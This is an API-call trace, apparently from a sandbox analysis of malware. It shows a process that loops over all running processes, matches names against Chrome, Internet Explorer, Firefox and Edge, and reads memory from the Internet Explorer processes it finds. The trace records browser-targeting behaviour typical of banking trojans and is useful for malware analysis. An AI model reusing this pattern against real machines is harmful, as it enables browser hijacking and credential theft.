	[0199.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.946] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.946] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0199.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.947] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.947] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0199.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1aa8
	[0199.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.948] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0199.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.948] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.948] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0199.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.949] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.949] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0199.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1aac
	[0199.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.950] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0199.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.950] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.951] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0199.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.951] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.952] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0199.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1ab0
	[0199.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.953] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0199.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.953] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.953] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0199.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.953] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.953] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0199.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1ab4
	[0199.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.954] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0199.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.955] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.955] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0199.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.956] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.956] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0199.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1ab8
	[0199.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.957] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0199.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.957] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.958] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0199.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.958] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.958] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0199.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1abc
	[0199.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.959] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0199.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.959] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.960] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0199.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.960] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.960] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0199.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1ac0
	[0199.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.961] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0199.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.961] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.961] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0199.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.962] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.962] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0199.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1ac4
	[0199.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.963] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0199.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.963] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.964] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0199.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.964] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.965] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0199.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1ac8
	[0199.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.965] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0199.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.966] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.967] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0199.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.967] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.968] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0199.968] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1acc
	[0199.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.968] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0199.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.969] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.969] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0199.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.970] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.970] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0199.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1ad0
	[0199.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.971] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0199.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.972] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.972] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0199.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.973] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.974] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0199.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1ad4
	[0199.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.974] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0199.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.975] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.975] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0199.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.976] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.976] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1ad8
	[0199.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.977] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.977] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.977] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.978] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.978] NtQueryInformationProcess (in: ProcessHandle=0x1ad8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.978] ReadProcessMemory (in: hProcess=0x1ad8, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.978] ReadProcessMemory (in: hProcess=0x1ad8, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.978] ReadProcessMemory (in: hProcess=0x1ad8, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.978] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.978] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x1adc
	[0199.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.979] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.980] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.980] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.980] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.980] NtQueryInformationProcess (in: ProcessHandle=0x1adc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.980] ReadProcessMemory (in: hProcess=0x1adc, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.980] ReadProcessMemory (in: hProcess=0x1adc, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.980] ReadProcessMemory (in: hProcess=0x1adc, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.981] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.981] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1ae0
	[0199.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.982] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.983] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0199.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1ae4
	[0199.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.983] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0199.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.984] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.984] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0199.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.984] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.985] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.985] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1ae8
	[0199.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.985] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.986] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.986] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.986] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.986] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.987] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0199.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x1aec
	[0199.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.988] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.988] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.989] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.989] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.989] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.990] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1af0
	[0199.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.990] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.990] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.991] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.991] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.991] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0199.992] CloseHandle (hObject=0x188) returned 1
	[0199.992] Sleep (dwMilliseconds=0x64) 
	[0200.086] GetCurrentProcessId () returned 0x110
	[0200.086] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0200.091] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0200.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0200.094] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0200.095] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1af4
	[0200.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.095] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.095] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.095] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.096] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.096] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.096] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0200.096] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0200.097] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1af8
	[0200.097] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.097] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0200.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.098] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0200.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.098] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0200.098] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0200.098] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
